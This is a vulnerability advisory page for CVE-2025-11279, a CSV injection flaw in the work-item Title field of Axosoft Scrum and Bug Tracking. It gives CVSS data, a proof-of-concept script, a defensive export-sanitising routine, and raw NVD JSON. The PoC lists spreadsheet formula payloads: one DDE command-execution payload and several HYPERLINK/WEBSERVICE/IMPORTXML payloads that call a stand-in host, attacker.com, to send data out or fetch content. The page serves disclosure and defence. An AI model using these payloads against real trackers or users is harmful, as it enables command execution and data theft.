Security Vulnerability Report
CVE-2025-11279 CVSS 5.5 MEDIUM

Published: 2025-10-05 03:15:40
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in Axosoft Scrum and Bug Tracking 22.1.1.11545. This issue affects some unknown processing of the component Add Work Item Page. Manipulation of the argument Title results in CSV injection (CWE-1236, a form of CWE-74 improper neutralization): a work item title that begins with a formula character is stored unchanged and is interpreted as a formula when the work items are exported and opened in a spreadsheet application. The attack can be launched remotely; per the CVSS 3.1 vector it requires a low-privileged account (PR:L) and succeeds only when a victim opens the exported file (UI:R). The exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Other scores reported by the source (VulDB, secondary):
CVSS 4.0: 2.0 LOW, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P (exploit maturity: proof of concept)
CVSS 2.0: 6.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:P/A:P

Configurations (Affected Products)

No CPE configuration data is available for this entry (NVD status: Deferred). The affected product named in the description is:

Axosoft Scrum and Bug Tracking 22.1.1.11545

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11279 - Axosoft Scrum and Bug Tracking CSV Injection PoC
# The vulnerability exists in the "Title" field of "Add Work Item Page".
# CSV formula characters injected at the beginning of the Title parameter are
# stored as-is and evaluated when an export of the work items is opened in a
# spreadsheet application.
import requests

# Malicious payloads that can be injected into the Title field:

# Payload 1: DDE-based command execution (Windows Excel; Excel shows a security
# prompt before launching the external program, which is the UI:R in the vector)
payload_1 = '=cmd|\'/c calc\'!A1'

# Payload 2: Data exfiltration via HYPERLINK (sends the contents of A1 when clicked)
payload_2 = '=HYPERLINK("http://attacker.com/exfil?data="&A1,"Click for details")'

# Payload 3: Information disclosure via IMPORTXML (Google Sheets function; has no
# effect in Excel, where it resolves to #NAME?)
payload_3 = '=IMPORTXML("http://attacker.com/malicious.xml","//data")'

# Payload 4: Phishing via warning message (WARNING is not a built-in function in
# Excel or Google Sheets, so this cell evaluates to #NAME? rather than a dialog)
payload_4 = '=10*10+WARNING("Your session has expired, please re-login")'

# Payload 5: Direct external reference (WEBSERVICE is available in Excel 2013+ on Windows)
payload_5 = '=WEBSERVICE("http://attacker.com/payload")'

# Example HTTP request to exploit the vulnerability:
target_url = "https://target-axosoft-server/ItemAdd.asp"
# (Actual endpoint may vary based on Axosoft version and configuration)

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    # An authenticated session is required (PR:L in the CVSS vector)
    "Cookie": "ASP.NET_SessionId=<valid_session_cookie>",
}

data = {
    "Title": payload_1,  # Inject malicious CSV formula as the Title
    "Description": "Normal description",
    "Priority": "1",
    # Other required fields...
}

# response = requests.post(target_url, headers=headers, data=data)

# After the work item is created, export the work items as CSV.
# When the victim opens the CSV in Excel, the formula is evaluated.
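Because the vendor did not respond, there is no fix for the tracker itself; the practical defence is to neutralise formula-leading cells wherever work items are exported, and to check exports that have already been produced. The following block is an added example written for this page, not code from Axosoft or from the PoC author. It applies the OWASP CSV injection rule (flag cells beginning with =, +, -, @, tab or carriage return; prefix them with a single quote so the spreadsheet stores them as text) to a constructed set of work items whose first Title mirrors the DDE payload above. The item records and field names are made up for the example; the export function with sanitize=False stands in for an export that trusts the stored Title, the vulnerable behaviour, and find_formula_cells is the triage check to run over a CSV you already have.

```python
import csv
import io

# Characters that make Excel, LibreOffice Calc or Google Sheets treat a cell as a
# formula or DDE expression (OWASP CSV Injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value: str) -> bool:
    """True if the cell would be evaluated as a formula when the CSV is opened.
    Leading spaces are ignored so that ' =cmd|...' is still flagged (conservative)."""
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Prefix a formula-looking cell with a single quote so it is stored as text.
    Quoting the field alone does not help: "=1+1" in a quoted CSV field is still a
    formula; the apostrophe is what forces text interpretation."""
    return "'" + value if is_formula_cell(value) else value


def export_csv(rows, fieldnames, sanitize=True) -> str:
    """Render work items (list of dicts) as CSV text.
    sanitize=False mirrors an export that writes the stored Title unchanged (the
    vulnerable behaviour); sanitize=True neutralises every cell first."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        out = {k: str(row.get(k, "")) for k in fieldnames}
        if sanitize:
            out = {k: neutralize_cell(v) for k, v in out.items()}
        writer.writerow(out)
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Scan an already-exported CSV and return (row_number, column, value) for every
    cell that would execute as a formula. Row numbers are 1-based data rows."""
    reader = csv.DictReader(io.StringIO(csv_text))
    hits = []
    for row_no, row in enumerate(reader, start=1):
        for col, val in row.items():
            if val is not None and is_formula_cell(val):
                hits.append((row_no, col, val))
    return hits


# Constructed sample work items (not real Axosoft data). Item 101 carries the DDE
# payload shape from the PoC; 103 and 104 are benign titles that the blanket rule
# also flags, which is the false-positive cost of this defence.
SAMPLE_ITEMS = [
    {"ID": 101, "Title": "=cmd|'/c calc'!A1", "Priority": 1},
    {"ID": 102, "Title": "Login page times out", "Priority": 2},
    {"ID": 103, "Title": "@alice please review", "Priority": 3},
    {"ID": 104, "Title": "-1 returned from parser", "Priority": 2},
]
FIELDS = ["ID", "Title", "Priority"]


if __name__ == "__main__":
    unsafe = export_csv(SAMPLE_ITEMS, FIELDS, sanitize=False)
    for row_no, col, val in find_formula_cells(unsafe):
        print(f"row {row_no} column {col!r} would evaluate as a formula: {val!r}")
    safe = export_csv(SAMPLE_ITEMS, FIELDS, sanitize=True)
    print("after neutralisation:", find_formula_cells(safe))
```

Two caveats when deploying this: the leading apostrophe is shown literally by some CSV viewers, so it is a presentation cost, not a data loss; and it protects only the export path. The malicious title remains in the tracker, so any other consumer that copies titles into a spreadsheet (a report, a paste from the web UI) is still exposed, and users of the affected version should be told not to open unsanitised exports in Excel with DDE or external data enabled.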

References

https://drive.google.com/file/d/1Lw9_KYblnhg7FQU70G0SgH_VyYRUD-rX/view?usp=sharing
https://vuldb.com/?ctiid.327013
https://vuldb.com/?id.327013
https://vuldb.com/?submit.659422

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11279", "sourceIdentifier": "[email protected]", "published": "2025-10-05T03:15:40.263", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Axosoft Scrum and Bug Tracking 22.1.1.11545. This issue affects some unknown processing of the component Add Work Item Page. The manipulation of the argument Title results in csv injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://drive.google.com/file/d/1Lw9_KYblnhg7FQU70G0SgH_VyYRUD-rX/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327013", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327013", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.659422", "source": "[email protected]"}]}}